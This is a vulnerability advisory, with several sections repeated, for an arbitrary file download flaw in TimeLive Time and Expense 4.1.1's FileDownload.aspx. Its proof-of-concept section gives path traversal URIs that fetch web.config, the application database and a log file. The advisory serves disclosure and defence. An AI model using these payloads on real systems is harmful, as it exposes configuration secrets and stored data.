TimeLive Time and Expense 'FileDownload.aspx' Arbitrary File Download Vulnerability
BID:49817
Info
TimeLive Time and Expense 'FileDownload.aspx' Arbitrary File Download Vulnerability
| Bugtraq ID: | 49817 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 28 2011 12:00AM |
| Updated: | Sep 28 2011 12:00AM |
| Credit: | Nathaniel Carew |
| Vulnerable: |
TimeLive TimeLive Time and Expense 4.1.1 |
| Not Vulnerable: | |
Discussion
TimeLive Time and Expense 'FileDownload.aspx' Arbitrary File Download Vulnerability
TimeLive Time and Expense is prone to a vulnerability that lets attackers download arbitrary files. This issue occurs because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the application. Information harvested may aid in launching further attacks.
TimeLive Time and Expense 4.1.1 is affected; other versions may also be vulnerable.
TimeLive Time and Expense is prone to a vulnerability that lets attackers download arbitrary files. This issue occurs because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the application. Information harvested may aid in launching further attacks.
TimeLive Time and Expense 4.1.1 is affected; other versions may also be vulnerable.
Exploit / POC
TimeLive Time and Expense 'FileDownload.aspx' Arbitrary File Download Vulnerability
An attacker can exploit this issue using a browser.
The following example URIs are available:
http://www.example.com/TimeLive/Shared/FileDownload.aspx?FileName=..\web.config
http://www.example.com/TimeLive/Shared/FileDownload.aspx?FileName=..\App_Data\TimeLive.mdf
http://www.example.com/TimeLive/Shared/FileDownload.aspx?FileName=..\Log\TimeLive.log
An attacker can exploit this issue using a browser.
The following example URIs are available:
http://www.example.com/TimeLive/Shared/FileDownload.aspx?FileName=..\web.config
http://www.example.com/TimeLive/Shared/FileDownload.aspx?FileName=..\App_Data\TimeLive.mdf
http://www.example.com/TimeLive/Shared/FileDownload.aspx?FileName=..\Log\TimeLive.log
Solution / Fix
TimeLive Time and Expense 'FileDownload.aspx' Arbitrary File Download Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].